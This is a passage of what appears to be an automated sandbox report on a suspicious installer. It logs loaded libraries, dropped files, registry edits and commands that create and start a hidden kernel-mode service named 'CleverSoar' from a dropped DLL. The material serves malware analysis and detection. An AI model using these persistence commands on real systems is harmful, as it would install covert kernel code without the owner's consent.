Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: apphelp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeStatic file information: File size 5707472 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000D.00000003.2197135796.0000000000E60000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000D.00000003.2197029483.00000000030D0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.13.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F857D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, | 11_2_00F857D0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.5.dr | Static PE information: real checksum: 0x0 should be: 0x343a15
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.dr | Static PE information: real checksum: 0x0 should be: 0x343a15
Source: update.vac.6.dr | Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.2.dr | Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe | Static PE information: real checksum: 0x0 should be: 0x571b37
Source: hrsw.vbc.6.dr | Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: tProtect.dll.13.dr | Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe | Static PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.dr | Static PE information: section name: .didata
Source: update.vac.2.dr | Static PE information: section name: .00cfg
Source: update.vac.2.dr | Static PE information: section name: .voltbl
Source: update.vac.2.dr | Static PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.5.dr | Static PE information: section name: .didata
Source: 7zr.exe.6.dr | Static PE information: section name: .sxdata
Source: is-R44JL.tmp.6.dr | Static PE information: section name: .xdata
Source: hrsw.vbc.6.dr | Static PE information: section name: .00cfg
Source: hrsw.vbc.6.dr | Static PE information: section name: .voltbl
Source: hrsw.vbc.6.dr | Static PE information: section name: .=~
Source: update.vac.6.dr | Static PE information: section name: .00cfg
Source: update.vac.6.dr | Static PE information: section name: .voltbl
Source: update.vac.6.dr | Static PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 6_2_6CC186EB push ecx; ret | 6_2_6CC186FE
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 6_2_6CAC0F00 push ss; retn 0001h | 6_2_6CAC0F0A
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 6_2_6CCE6F10 push eax; ret | 6_2_6CCE6F2E
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 6_2_6CC4B9F4 push 004AC35Ch; ret | 6_2_6CC4BA0E
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 6_2_6CCE7290 push eax; ret | 6_2_6CCE72BE
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F045F4 push 00FAC35Ch; ret | 11_2_00F0460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F9FB10 push eax; ret | 11_2_00F9FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F9FE90 push eax; ret | 11_2_00F9FEBE
Source: update.vac.2.dr | Static PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.6.dr | Static PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.6.dr | Static PE information: section name: .=~ entropy: 7.19316283520878
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | File created: C:\Users\user\AppData\Local\Temp\is-P0N7P.tmp\update.vac
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | File created: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | File created: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | File created: C:\Program Files (x86)\Windows NT\is-R44JL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | File created: C:\Users\user\AppData\Local\Temp\is-D4O0V.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe | File created: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | File created: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | File created: C:\Users\user\AppData\Local\Temp\is-P0N7P.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | File created: C:\Program Files (x86)\Windows NT\7zr.exe
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | File created: C:\Users\user\AppData\Local\Temp\is-D4O0V.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | File created: C:\Users\user\AppData\Local\Temp\is-D4O0V.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | File created: C:\Users\user\AppData\Local\Temp\is-P0N7P.tmp\update.vac
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
